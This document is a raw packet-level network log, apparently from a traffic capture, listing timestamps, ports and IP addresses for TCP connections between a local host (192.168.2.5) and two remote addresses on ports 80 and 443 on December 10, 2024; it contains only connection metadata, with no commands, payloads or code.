Dec 10, 2024 11:11:28.399488926 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.399499893 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.400332928 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.400403023 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.400414944 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.401246071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.401312113 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.401321888 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.401334047 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.401886940 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.402111053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.402173042 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.402183056 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.402184010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.402270079 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.402987003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.403068066 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.403079987 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.403278112 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.403985977 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.404041052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.404051065 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.404928923 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.404938936 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.404953003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.405829906 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.405930996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.405941963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.406620026 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.406670094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.406681061 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.407533884 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.407613993 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.407624960 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.408437014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.408452034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.408463001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.409300089 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.409356117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.409367085 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.409591913 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.410079002 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.410161972 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.410269022 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.410281897 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.411106110 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.411417007 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.411427975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.411438942 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.412300110 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.412358046 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.412369013 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.413192034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.413204908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.413217068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.413433075 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.413606882 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.413636923 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.413741112 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.414072037 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.414125919 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.414136887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.414556980 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.415055037 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.415157080 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.415169001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.415899038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.415985107 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.415996075 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.416768074 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.416826963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.416837931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.417840004 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.417943001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.417953968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.418015003 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.418073893 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.418662071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.418673992 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.418684959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.418920040 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.419534922 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.419609070 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.419620991 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.420355082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.420408964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.420419931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.420774937 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.563101053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563152075 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563163996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563465118 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563496113 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.563514948 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563533068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.563563108 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.563646078 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.564328909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.564635038 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.587737083 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587786913 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587805033 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587820053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587831974 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587837934 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.587846041 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587930918 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587944031 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.587955952 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588036060 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.588123083 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588135004 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588146925 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588342905 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588366032 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.588388920 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.588407040 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588423967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.588650942 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.589246035 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.589334011 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.589354038 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.589354038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.589382887 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.589397907 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.590131998 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.590184927 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.590198040 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.590302944 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.591033936 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.591089010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.591100931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.591110945 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.591175079 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.591970921 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.592036009 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.592061996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.592075109 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.592415094 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.592824936 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.592875957 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.592888117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.593106031 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.593728065 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.593803883 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.593815088 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.593816042 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.593858004 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.594611883 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.594641924 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.594654083 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.595052958 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.595505953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.595525980 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.595537901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.596362114 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.596395969 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.596458912 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.596472025 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.596472979 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.596508026 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.596528053 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.597323895 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.597349882 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.597361088 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.597496986 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.598279953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.598342896 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.598367929 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.598381042 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.598428011 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.599138975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.599159002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.599172115 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600039005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600091934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600104094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600888968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600895882 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.600943089 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.600958109 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.601830006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.601891994 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.601903915 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.602683067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.602754116 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.602766991 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.603543043 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.603622913 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.603643894 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.603652954 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.603656054 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.603674889 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.603698015 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.604523897 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.604794979 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.604856968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.604887962 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.604994059 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.605148077 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.605669975 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.605731964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.605743885 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.605772972 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.605809927 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.606596947 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.606632948 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.606645107 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.606777906 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.607480049 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.607567072 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.607579947 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.607630014 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.608362913 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.608448982 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.608462095 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.609282017 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.609364986 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.609376907 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.609765053 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.609867096 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.610176086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.610197067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.610215902 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.610363960 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.611114979 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.611162901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.611175060 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.611964941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.612036943 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.612050056 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.612582922 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.612884045 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.612957001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.612968922 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.613178015 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.613779068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.613856077 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.613867998 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.614614964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.621105909 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.705102921 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.705157995 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.705184937 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.705226898 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.705256939 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.707637072 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.707698107 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.714104891 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.714126110 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.714289904 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.716186047 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.724637985 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.739327908 CET	443	49881	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:28.742187023 CET	49881	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:28.755322933 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755357981 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755371094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755506992 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.755692005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755752087 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.755779982 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755793095 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.755831003 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.756602049 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.756649017 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.778201103 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778255939 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.778263092 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778275967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778320074 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.778620958 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778667927 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.778681040 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778692961 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.778728962 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.779587030 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.779599905 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.779613018 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.779634953 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.779654980 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.780436039 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.780484915 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.780509949 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.780524015 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.780569077 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.781316996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.781363010 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.781398058 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.781409979 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.781445980 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.782207012 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.782242060 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.782252073 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.782254934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.782296896 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.783143044 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.783235073 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.783246994 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784039021 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784050941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784063101 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784868956 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784905910 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.784918070 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.785681009 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.785753965 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.785814047 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.785825968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.785831928 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.785909891 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.786103010 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.786684036 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.786748886 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.786756039 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.786768913 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.786813021 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.787631989 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.787643909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.787663937 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.788186073 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.788475990 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.788522005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.788536072 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.789202929 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.789403915 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.789465904 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.789475918 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.789488077 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.789530993 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.790326118 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.790369034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.790380955 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.790553093 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.791217089 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.791273117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.791285038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:28.791295052 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.791318893 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:28.792077065 CET	80	49880	185.215.113.16	192.168.2.5
